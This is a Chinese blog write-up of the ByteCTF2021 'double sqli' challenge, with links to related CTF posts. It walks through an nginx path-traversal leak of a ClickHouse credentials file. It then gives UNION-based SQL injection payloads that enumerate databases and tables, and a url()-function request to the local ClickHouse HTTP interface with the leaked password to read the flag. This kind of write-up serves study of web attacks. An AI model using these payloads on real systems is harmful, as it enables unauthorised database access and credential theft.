ByteCTF2021 double sqli详解

最新推荐文章于 2021-12-13 22:36:52 发布
最新推荐文章于 2021-12-13 22:36:52 发布
阅读量524 收藏 1
点赞数
分类专栏: CTF 复现 安全 文章标签: sql 数据库 nginx wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/120863763
版权
CTF 同时被 3 个专栏收录
31 篇文章 1 订阅
订阅专栏
复现
31 篇文章 3 订阅
订阅专栏
安全
9 篇文章 0 订阅
订阅专栏

ByteCTF2021–writeup(double sqli)

一.正文

首先,拿到题目之后,访问网站的根目录,可以看到一个链接,点进去之后就网站就会返回一个图片。图片之没什么用的,然后直接访问files目录。

请添加图片描述
利用nginx配置不当导致的目录跨越漏洞进行利用。访问files…/
请添加图片描述
发现可以访问任意目录,然后到/var/lib/clickhouse/access下下载sql文件,有一个SQL文件是可以下载的。
请添加图片描述请添加图片描述

下载之后,用workbench把它打开,查看其中的文件内容。
请添加图片描述
我们可以看到有一个user_01的用户,而且我们还得到了他的明文密码。
题目是double sqli,很明显是要我们进行sql注入的,注入点就是上面url中的id。尝试进行sql注入测试。

?id=0%20union%20all%20select%20(database());

然后是有回显的,如下是回显结果。
请添加图片描述
在这里要提前说明一点在上面我们在找sql文件的时候我们已经得知该网站所用的数据库是clickhouse,我们要参照clickhouse的官方文档进行下一步的操作。官方文档https://clickhouse.com/docs/zh/operations
下面贴一张图,上面是官方文档列出的系统表,也是我们接下来要进行操作的重要工具。
请添加图片描述
好让我们回到题目中,我们刚才拿到了当前数据库的名字,然后继续往下进行,依次解出他的表明以及字段名。

(表名)

?id=0%20union%20all%20select%20name%20from%20system.tables%20where%20database=%27default%27;

请添加图片描述
(字段名)

?id=0%20union%20all%20select%20name%20from%20system.columns%20where%20database=%27default%27and%20table%20=%20%27hello%27;

请添加图片描述
(然后看表的内容)

?id=0%20union%20all%20select%20*%20from%20hello;

请添加图片描述
额。。。。好像走了一圈之后,并没有什么用。
请添加图片描述
那就看看他还有没有别的什么数据库,还是用刚才说过的系统表进行操作。

?id=0%20union%20all%20select%20name%20from%20system.databases;

请添加图片描述
哦。。。果然有第二个数据库,然后故技重施。

id=0%20union%20all%20select%20name%20from%20system.tables%20where%20database=%27ctf%27;

请添加图片描述
然后当我尝试读取的时候。

?id=0%20union%20all%20select%20*%20from%20ctf.hint;

请添加图片描述
笑死,根本没有权限。
那好,我们看一下我们现在的数据库用户是什么?

?id=0%20union%20all%20select%20user();

请添加图片描述
刚才那个sql文件里面写的好像是user_01来着,看来我们要通过其他方式进行高权限用户登录以实现数据库访问了。
去官方文档中搜集一波信息,然后就找到了几个比较有意思的函数以及clickhouse的特殊用法
请添加图片描述
请添加图片描述
请添加图片描述
上面这三张图告诉了我们几个信息。
1.clickhouse支持内网的服务,可以通过get请求的方式进行用户的登录,以及SQL语句的执行。

2.我们可以通过select * from url()的形式,将url中请求到的列以指定的形式反馈回来。

有了这两个前提条件我们就可以进行payload的构建了。

?id=0%20union%20all%20select%20*%20from%20url(%27http://127.0.0.1:8123/?user=user_01%26password=e3b0c44298fc1c149afb%26query=select%2520*%2520from%2520ctf.hint%27,CSV,%27column%20String%27);

请添加图片描述
额。。。。麻了,还是权限不允许。但是我们是通过usr_01进行数据库操作的,所以权限是一定够的。那么可以推断这个表的内容就是这个dont_have_permission。
我们去查一下是否还有其他的表,通过这个user_01用户.

?id=0%20union%20all%20select%20*%20from%20url(%27http://127.0.0.1:8123/?user=user_01%26password=e3b0c44298fc1c149afb%26query=select%2520name%2520from%2520system.tables%27,CSV,%27column%20String%27);

请添加图片描述
看来是有的,那么咱们直接读这个flag。

?id=0%20union%20all%20select%20*%20from%20url(%27http://127.0.0.1:8123/?user=user_01%26password=e3b0c44298fc1c149afb%26query=select%2520*%2520from%2520ctf.flag%27,CSV,%27column%20String%27);

请添加图片描述
好了,战斗结束。

二.后记

其实在解题目的过程中,还是遇到了一些问题。大都来自于对这个clickhouse数据库操作的生疏。在我进行查表的过程中,这个问题显得尤为突出。
正常在mysql数据库下我们查数据库下的表应该是这样

?id=0%20union%20all%20select%20name%20from%20system.tables where database=XXXX;

当然这里只是打个比方,事实上MySQL中并没有system.tables.我这里只是想说他应该会有where子句。但是我在做这道题的时候,在我加上where子句的时候该网站的后端数据库,会给我返回报错。

在clickhouse中,如下的查询语句好像是更好的方式。

?id=0%20union%20all%20select%20name%20from%20system.tables

在官方文档中也没有给出解释,但是它在每一个系统表的后面都有着这样一句话。
请添加图片描述
我想这个可能就是原因之一,当然也可能不是。

入山梵行
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku Crypto Double wp
shifaziran2007的博客
09-09 1698
Double.sage from Crypto.Util.number import bytes_to_long from secrets import k, P, flag E = EllipticCurve(QQ,[0,2021,0,310,-2783]) assert P.xy()[1] == E.lift_x(2) Q = k * P R = Q + P p = Q[0].numerator() q = R[0].numerator() e = 0x10001 n = p * q asser
ByteCTF2021-复现-misc-Hearing is not believing
ookami6497的博客
10-19 1230
里面大佬太强了,我好菜啊 下载附件得到一个hearing.wav文件 先用Audacity打开,查看频谱图,一看这前面是个二维码,拼就完事:画二维码网站(外国的) 先截得清晰一些 注意这是反色过的二维码,建议反色后再照着拼 拼出来的结果 扫描后得到 m4yB3_ ,一看就不全 然后我就不会了,,,后面看大佬的wp才知道后面是用 robot36 解密(和sstv搭配使用,sstv将图片转声音,由喇叭发声,,,,,robot36将声音转图像。。) 用手机装个robot36
2021 bytectf pwn bytecmsc
yongbaoii的博客
10-21 457
保护显然是全绿 我们来分析程序 首先会进入一个验证环节。 里面会将那一串字符串进行一个随机,随机的种子是time。 那么我们显然不能够用常规方法过掉检查,因为毕竟是会跟时间为种子的随机数随机起来。 那么我们要知道,time这里的种子是秒级的,不是毫秒,那么我们可以在写exp的时候也同时启动一个time的种子,然后来将字符串进行同样的随机,以此来达到一个预测随机的目的。 因为time种子是秒级的,基本上都可以过。 下面是一个堆。 我们逐个分析。 add函数 是一个while循环,输入1可以继续加。 里
ByteCTF2021安全范儿高校挑战赛线上Misc-《HearingNotBelieving》
Mark的博客
10-19 3523
刚拿到文件便发现是一段音频,直接丢进Audacity 频率改一下窗口大小再放大(便不会模糊) 前面的是频谱图中有二维码,截图后手拼下得到前半段flag拼接完成我这加了个滤镜才扫出来了 得到第一部分的flag 第二部分的flag需要通过音频转图片的方式得出,这里用到了Robot36这个手机软件(没有软件的可以私聊发给你),在手机上打开软件,然后通过电脑外发音频,手机麦克风接受音频然后得到图片,最后进行拼图 类似这种图很多张 最后ps或ppt进行拼图得到 加个滤镜就可以扫出来 处理下扫描得到后半段
ByteCTF 2021(Crypto部分)
m0_57291352的博客
10-24 704
easyxor 核心加密算法convert就是四个shift,写个逆就行,flag被分为两部分,前半部分用OFB模式加密,后半部分用CBC模式加密,由于CBC模式的缺陷,当我们只考虑最后一块时,将倒数第二块作为iv,凭借flag的格式做判断即可爆破出key,再利用OFB模式的漏洞,结合key与已知的flag格式即可逆推出iv,此时iv和key尽知,直接解密即可 from Crypto.Util.number import bytes_to_long, long_to_bytes from random im
sqli-lab操作详解
07-12
sqli-lab操作详解
sqli-bypass靶场
最新发布
11-10
sqli-bypass靶场
安装sqli-labs
10-22
安装sqli-labs
sqli-labs.rar
07-06
sqli渗透靶场,印度阿三创作
sqlilabs过关手册注入天书
08-17
sqlilabs过关手册注入天书
ByteCTF2021 Final reverse ByteService wp
qq_41866334的博客
12-13 3058
ByteCTFFinal2021 reverse ByteService wp 题目给的apk里面是一个RPC调用, 发现找了ByteService这个服务 public void callCTFService(int i, int i2) { try { Class<?> cls = Class.forName("android.os.ServiceManager"); Parcel obtain = Parcel.obtain(
BMZCTF sqli_double
qq_26243045的博客
11-29 405
考点:代码审计、sql注入 打开页面即可看到源码: 有两个页面,一个是修改密码的(需要知道用户名和邮箱),一个是登录页面。 因为我们不知道用户名和邮箱,先试试登录页面: 回显提示"登录失败",我们不知是密码还是用户名错了,尝试使用sqlmap进行爆破: 可以看到已经试出了数据库类型为mysql 爆库: 爆表: 爆内容: 现在我们知道了用户名和邮箱,就可以修改密码了。修改密码后登录,即可看到flag: ...
Byctf2021 double sqli
qq_51143448的博客
10-19 2679
1.double sqli 通过报错 ,发现是一个不常用的数据库 clickhouse 去查了一下官方文档 什么是ClickHouse? | ClickHouse文档,差不多与mysql数据库类似,他也有一个类似于mysql的information_schema 储存了数据库相关信息 (system)//之前傻逼了不好好看报错信息研究了半天,这还有小细节 union 联合查询的使用用 union all select 全部打印。官方文档里有解释(搞得我只能用python写bool注入的语句白跑了一下午)
2021Bytectf初赛misc-frequently
qq_43200143的博客
10-20 356
Someone wants to send secret information through a surreptitious channel. Could you intercept their communications? dns隧道 过滤一下dns协议 发现有很多向8.8.8.8请求,然后域名前带有信息,于是过滤一下8.8.8.8 发现这里面有两种,一种是i和o开头的,推测是0和1,另外一种是字符串, 看到最后一个包这里的==,推测是64编码,就可以过滤一下之前所有带字符串的,然后拼接起来,解
ByteCTF2021 reverse languagebinding writeup
qq_41866334的博客
10-18 765
Language Binding AAA : immortal 拿到题目ida打开发现是go语言逆向,而且函数名都被混淆掉了,动态调了一下整个人都傻了。 之后尝试直接打开了new_lang_script.out,看了一下有大量的0x55所以估计就是异或了0x55,解密出来发现是一个luac文件,修改文件头以后直接用luac -l执行,发现会报错。和我自己写的lua脚本比对会发现题目luac中的opcode全都是打乱的。 此时猜测这个程序就是用go语言写的一个执行luac脚本的编译器,因此真正解释执行的
ctf2021/1/14
u012163017的博客
01-19 315
CTF笔记汇编地址总线功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 汇编 地址总线 寻址能力 : 一个cpu有N根地址线,则可以说这个CPU的地址总线的宽度为N。这样的CPU最多可寻找2的N次方个内存单元。 一个字节是一个内存
2021ByteCTF题目及附件
NNanfeng
10-18 758
需要的师傅自行下载哦,点个赞吧 hi,这是我用百度网盘分享的内容~复制这段内容打开「百度网盘」APP即可获取  链接:https://pan.baidu.com/s/1CqvAZ9TP93QSqX8aKg4A2Q  提取码:xgk4
ByteCTF2021 Crypto - easyxor writeup
风好衣轻
10-21 771
easyxor shift函数是个常见的移位异或操作,convert是对一个数字使用不同的key和mask进行4次移位异或,这个函数在已知key的情况下是可逆的。 encrypt函数是对明文块进行两种模式(CBC和OFB)的块加密,块长度为8,对于每一块的加密使用的就是上面的convert函数。 首先通过密文的长度可以得知一共被分成了6块;前3块明文使用OFB模式,后三块明文使用CBC模式;keys是一个长度为4的列表,列表中每个值的范围是(-32, 32),64464^4644爆破也是可以接受的。 读完题
Bytesctf2021 frequently详解
Demodd的博客
10-22 4202
frequently 先看的tcp的流,没发现什么东西,然后开始看UDP,在UDP的第一个流发现 得到 se1f_wIth_m1sc^_^} 然后一直往后看,在第68个流发现png的base64加密后的数据 base64解密一下发现 继续往后看发现多个一样的数据,传输图片无疑了。 当时解题时候直接依据这个提取了这部分数据,包括重复的包还有多的包等等(体现了对过滤语句的不熟练) 通过观察可以发现这部分数据的源地址和目的地址都是相同的可以先通过这个过滤 ip.src==10.2.173.238 and
sqli-labs-master详解
09-10
sqli-labs-master是一个用于学习SQL注入的实验平台。它提供了一系列具有不同难度级别的漏洞实例,可以帮助用户了解和学习如何防范和利用SQL注入漏洞。引用中提到了一个重置数据库的方法,即进入sqli-labs-master下的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值